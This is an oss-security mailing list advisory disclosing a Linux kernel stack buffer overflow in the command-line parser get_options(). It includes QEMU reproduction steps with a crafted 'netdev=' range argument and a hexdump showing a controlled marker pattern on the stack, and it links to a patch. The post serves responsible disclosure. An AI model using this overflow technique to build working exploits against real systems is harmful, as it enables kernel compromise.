Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 30 May 2017 08:17:54 +0400
From: Ilya Matveychikov <matvejchikov@...il.com>
To: oss-security@...ts.openwall.com
Cc: Roee Hay <roeehay@...il.com>
Subject: Linux kernel: stack buffer overflow with controlled payload in get_options() function

Hello,

I’ve found the bug in get_options() function which is used for parsing
kernel’s cmdline string. The bug is similar to CVE-2017-1000363 described
by Roee Hay (https://alephsecurity.com/vulns/aleph-2017023).

Details
=======

When using get_options() it's possible to specify a range of numbers,
like 1-100500. The problem is that it doesn't track array size while
calling internally to get_range() which iterates over the range and
fills the memory with numbers.

Given that one can use “netdev=min-max” option to cause stack overflow
with controlled payload. Here are some simple steps to reproduce the
problem in QEMU-based virtual environment:

1) Run kernel in QEMU and wait for system halt:

  $ qemu-system-x86_64 -no-reboot -no-shutdown -kernel \
    /boot/vmlinuz-4.4.0-66-generic -append "netdev=3735928559-3735999999"

2) After the system halt enter in QEMU console by pressing Ctrl-Alt-2 and dump
  all the guest's machine memory:

  compat_monitor0 console
  QEMU 2.5.0 monitor - type 'help' for more information
  (qemu) dump-gest-memory dump <ENTER>
  (qemu) quit <ENTER>

3) Look for pair of magic numbers (deadbeef,deadbef0) in "dump" file:

  $ hexdump -C dump | grep "ef be ad de f0 be ad de"
  01de42e0  ef be ad de f0 be ad de  f1 be ad de f2 be ad de  |................|

4) Follow address <01de42e0> in hexdump:

  01de42e0  ef be ad de f0 be ad de  f1 be ad de f2 be ad de  |................|
  01de42f0  f3 be ad de f4 be ad de  f5 be ad de f6 be ad de  |................|
  01de4300  f7 be ad de f8 be ad de  f9 be ad de fa be ad de  |................|
  01de4310  fb be ad de fc be ad de  fd be ad de fe be ad de  |................|
  01de4320  ff be ad de 00 bf ad de  01 bf ad de 02 bf ad de  |................|
  01de4330  03 bf ad de 04 bf ad de  05 bf ad de 06 bf ad de  |................|
  01de4340  07 bf ad de 08 bf ad de  09 bf ad de 0a bf ad de  |................|
  01de4350  0b bf ad de 0c bf ad de  0d bf ad de 0e bf ad de  |................|
  01de4360  0f bf ad de 10 bf ad de  11 bf ad de 12 bf ad de  |................|
  01de4370  13 bf ad de 14 bf ad de  15 bf ad de 16 bf ad de  |................|
  01de4380  17 bf ad de 18 bf ad de  19 bf ad de 1a bf ad de  |................|
  01de4390  1b bf ad de 1c bf ad de  1d bf ad de 1e bf ad de  |................|
  01de43a0  1f bf ad de 20 bf ad de  21 bf ad de 22 bf ad de  |.... ...!..."...|
  01de43b0  23 bf ad de 24 bf ad de  25 bf ad de 26 bf ad de  |#...$...%...&...|
  01de43c0  27 bf ad de 28 bf ad de  29 bf ad de 2a bf ad de  |'...(...)...*...|
  01de43d0  2b bf ad de 2c bf ad de  2d bf ad de 2e bf ad de  |+...,...-.......|
  01de43e0  2f bf ad de 30 bf ad de  31 bf ad de 32 bf ad de  |/...0...1...2...|
  01de43f0  33 bf ad de 34 bf ad de  35 bf ad de 36 bf ad de  |3...4...5...6...|
  01de4400  37 bf ad de 38 bf ad de  39 bf ad de 3a bf ad de  |7...8...9...:...|
  01de4410  3b bf ad de 3c bf ad de  3d bf ad de 3e bf ad de  |;...<...=...>...|
  01de4420  3f bf ad de 40 bf ad de  41 bf ad de 42 bf ad de  |?...@...A...B...|
  01de4430  43 bf ad de 44 bf ad de  45 bf ad de 46 bf ad de  |C...D...E...F...|
  01de4440  47 bf ad de 48 bf ad de  49 bf ad de 4a bf ad de  |G...H...I...J...|
  01de4450  4b bf ad de 4c bf ad de  4d bf ad de 4e bf ad de  |K...L...M...N...|
  01de4460  4f bf ad de 50 bf ad de  51 bf ad de 52 bf ad de  |O...P...Q...R...|
  01de4470  53 bf ad de 54 bf ad de  55 bf ad de 56 bf ad de  |S...T...U...V...|
  01de4480  57 bf ad de 58 bf ad de  59 bf ad de 5a bf ad de  |W...X...Y...Z...|
  01de4490  5b bf ad de 5c bf ad de  5d bf ad de 5e bf ad de  |[...\...]...^...|
  01de44a0  5f bf ad de 60 bf ad de  61 bf ad de 62 bf ad de  |_...`...a...b...|
  01de44b0  63 bf ad de 64 bf ad de  65 bf ad de 66 bf ad de  |c...d...e...f...|
  01de44c0  67 bf ad de 68 bf ad de  69 bf ad de 6a bf ad de  |g...h...i...j...|
  01de44d0  6b bf ad de 6c bf ad de  6d bf ad de 6e bf ad de  |k...l...m...n...|
  01de44e0  6f bf ad de 70 bf ad de  71 bf ad de 72 bf ad de  |o...p...q...r...|
  01de44f0  73 bf ad de 74 bf ad de  75 bf ad de 76 bf ad de  |s...t...u...v...|
  01de4500  77 bf ad de 78 bf ad de  79 bf ad de 7a bf ad de  |w...x...y...z...|
  01de4510  7b bf ad de 7c bf ad de  7d bf ad de 7e bf ad de  |{...|...}...~...|
  01de4520  7f bf ad de 80 bf ad de  81 bf ad de 82 bf ad de  |................|
  01de4530  83 bf ad de 84 bf ad de  85 bf ad de 86 bf ad de  |................|
  01de4540  87 bf ad de 88 bf ad de  89 bf ad de 8a bf ad de  |................|
  01de4550  8b bf ad de 8c bf ad de  8d bf ad de 8e bf ad de  |................|
  ...

The patch for the bug was submitted by me to LKML list recently:
https://lkml.org/lkml/2017/5/22/581

This was reported to security@...nel.org, also.

Ilya Matveychikov

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ